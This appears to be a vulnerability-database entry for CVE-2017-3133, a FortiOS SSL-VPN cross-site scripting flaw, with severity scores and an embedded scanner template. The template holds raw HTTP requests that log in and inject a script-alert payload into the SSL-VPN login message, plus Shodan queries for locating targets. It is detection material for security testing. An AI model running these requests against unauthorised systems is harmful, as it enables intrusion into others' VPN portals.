CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
id: CVE-2017-3133
info:
name: Fortinet FortiOS < 5.6.0 - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
impact: |
Successful exploitation could lead to execution of malicious javascript.
remediation: |
Apply the latest security patches or upgrade to new version to mitigate the XSS vulnerability.
reference:
- https://www.exploit-db.com/exploits/42388
- https://nvd.nist.gov/vuln/detail/CVE-2017-3133
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2017-3133
cwe-id: CWE-79
epss-score: 0.00046
epss-percentile: 0.15636
cpe: cpe:2.3:o:fortinet:fortios:5.4.0:*:*:*:*:*:*:*
metadata:
vendor: fortinet
product: fortios
shodan-query:
- http.html:"/remote/login" "xxxxxxxx"
- http.favicon.hash:945408572
- cpe:"cpe:2.3:o:fortinet:fortios"
tags: cve,cve2017,fortinet,fortios,xss,authenticated
http:
- raw:
- |
POST /logincheck HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain;charset=UTF-8
ajax=1&username={{username}}&secretkey={{password}}
- |
POST /p/system/replacemsg/edit/sslvpn/sslvpn-login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: {{csrf}}
DNT: 1
csrfmiddlewaretoken={{csrf}}&buffer=ABC%3C%2Ftextarea%3E%0A%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E%0A
- |
GET /p/system/replacemsg-group/edit/None/sslvpn/sslvpn-login/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-CSRFTOKEN: {{csrf}}
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- "</textarea><script>alert(document.domain)</script>"
- type: word
part: header_3
words:
- "text/html"
- type: status
status:
- 200
extractors:
- type: regex
part: header
name: csrf
group: 2
regex:
- 'ccsrftoken_([0-9_a-z]+)="([A-Z0-9]+)";'
internal: true
# digest: 490a00463044022021260910d952deb40ec51e0a12cdf107926cc56b29a82cf7e81f19057d1d1637022046adbb0614cc0489fc28d72a87e13d4e7ad1da5726f244cd7db9efe0bbcada6f:922c64590222798bb761d5b6d8e72950
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:N/I:P/A:N
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
LOW
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
AI Score
Confidence
High